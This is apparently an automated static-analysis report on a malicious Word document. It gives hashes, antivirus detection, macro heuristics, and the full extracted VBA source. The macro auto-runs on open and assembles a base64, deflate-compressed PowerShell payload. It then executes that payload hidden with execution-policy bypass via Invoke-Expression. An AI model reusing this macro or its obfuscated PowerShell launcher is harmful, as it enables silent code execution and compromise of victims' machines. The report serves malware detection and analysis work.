Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 e88045931b9d9951…

MALICIOUS

Office (OLE)

137.5 KB Created: 2016-09-30 10:53:00 Authoring application: Microsoft Office Word First seen: 2020-12-25
MD5: a7b2aa20628ccb7b576b8f7246f92e74 SHA-1: 03da3415e9aee4ffea2ab8e4b82e9e696a530f5c SHA-256: e88045931b9d99511ce71cc94f2e3d1159581e5eb26d4e05146749e1620dc678
318 Risk Score

Heuristics 10

  • ClamAV: Doc.Downloader.Pwshell-10001336-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Pwshell-10001336-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell exec, vbHide
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
        Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Arch = Environ("PROCESSOR_ARCHITECTURE")
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3006 bytes
SHA-256: dcc4bd0faccbbd2d385b67da3788a1be1aa30601b6dcacec5a8282916a3484d5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Sub AutoOpen()
'VBA arch detect suggested by "T"
Dim Command As String
Dim str As String
Dim exec As String

Arch = Environ("PROCESSOR_ARCHITECTURE")
windir = Environ("windir")
If Arch = "AMD64" Then
    Command = windir + "\syswow64\windowspowershell\v1.0\powershell.exe"
Else
    Command = "powershell.exe"
End If

str = "5VZRj6M2EH7Pr7AiHhItrIzBEC5a6a49VTqpqirt6u4hygMY00UlEB"
str = str + "FyzV7b/15mnDExez1V7WNfBuwZf/PNeDy2p9gDe7tc7N43zY"
str = str + "fDseuH1fJX3be6icR92TTL9Z4dz0VTK3Ya8mH86Msw6tmHdv"
str = str + "h56NnHuh/OefOuaTq1us795rNz3Q7scv2+XL9f1tt/7ef7Xu"
str = str + "eDfnoePyX5OV9xP/ts8nz9u/F9nZl7P5w+q374J74P+nDSw+"
str = str + "o1so1q+XbhdWMi35Vl8PRy1CwY1xS6f6+ruq2HumuZp1jwU3"
str = str + "7QbPmpbiOxZEE7jk7HXGmGMz+cWwWWJxYc89NpeO7PC+/y4H"
str = str + "Vv3jhJ5j6/hJzDJzKfmK+3bPfdy6B3+713gh3ll0qNGr0ZxS"
str = str + "YbBRpOIuGk0BKAwlGUAhQxKIpRSIEenCFXzjC0xikMBXjj1S"
str = str + "iKFGjlMJcQfFXRnwLQHKAiEAnMpfDHEQX+BJgoNIZlvASBQ0"
str = str + "DWYFdxoiFTl5XlHAvygWvLSQF/KSZHEqE0Js6TsZxWgHG4sY"
str = str + "42RNIYR8AqIm9xRnaRzZCx+2Y2/jbeCLxpJAl0KwDl4C0Fuw"
str = str + "q0UUFDEZMdpknOOMcO5ySx/JB44RiHyjE2drOIbCHFMcGjkA"
str = str + "UJ3F8JJhKyK234GBE6khVpETkE4hq5AD8JYSVgl2gQknbLlD"
str = str + "IoUkhTklkT9BaTNlZkguXIU2JQYpowQ+75MOcK/YJdmlt4ZQ"
str = str + "XEISraZAF+8bhgWeBZSCICSAAq5bQM2Rs8YfEkbaOwzmVE1R"
str = str + "RLUkSp421aIWc5iC17UKSRRdaUHIMnLV7oMpigEoKSsxA2dq"
str = str + "34D2uRmu1SpiL+38IkIvNvuwXu71yElMkIzxYkO4Vl+azGC1"
str = str + "LgkTSNJyMAg4KtL3Ln7P0hQv/2aGBhSnv8TAcGuwxcquS1cy"
str = str + "z0KSK8bLBdJzZebP/mZopJeyNC+2f9IrKcCrhw/CIh5bbcry"
str = str + "YxITyBfReG2OrTGd7srogdZNRWCWlNnwQGVUZMeUaOcki2mp"
str = str + "p0+RXidgPM2cfwteOylP6r2Mw22trA2KaEFTZobL7cDbCoaC"
str = str + "uE/TMPDSSUUmyFcvxibKHdaTz72FSzjEwmgcgppgkDxJdC4X"
str = str + "hDpni9FwCaC4pjYopRxtaYm0fRa5SbZj7VbkpaPGo51hpe4N"
str = str + "LxkUWkQGFeS6kDwG2/nx8NW1J4l2WJBRDfKikFdWAuV/BhXg"
str = str + "CRayeJKbJHLSY7sid+ErhvNw1e0L6huJnDUua+cxEkJDjfLq"
str = str + "quZyuvfuBbr2ZBo8fBSd3/qNtfhucgXI+zd3dr9ju8Vq/P5Z"
str = str + "15L+9X3uX+qRsHkVit77x67bNx6c6r9z4L1+wP1p2HoD03zf"
str = str + "bPhfcF37vOY39k5XsXHz7wzn0c8n4IHhutjyx41KprSwbPYc"
str = str + "7/Ag=="

exec = Command + " -NoP -NonI -W Hidden -Exec Bypass -Comm"
exec = exec + "and ""Invoke-Expression $(New-Object IO.StreamRea"
exec = exec + "der ($(New-Object IO.Compression.DeflateStream ("
exec = exec + "$(New-Object IO.MemoryStream (,$([Convert]::From"
exec = exec + "Base64String(\"" " & str & " \"" )))), [IO.Compr"
exec = exec + "ession.CompressionMode]::Decompress)), [Text.Enc"
exec = exec + "oding]::ASCII)).ReadToEnd();"""

Shell exec, vbHide

End Sub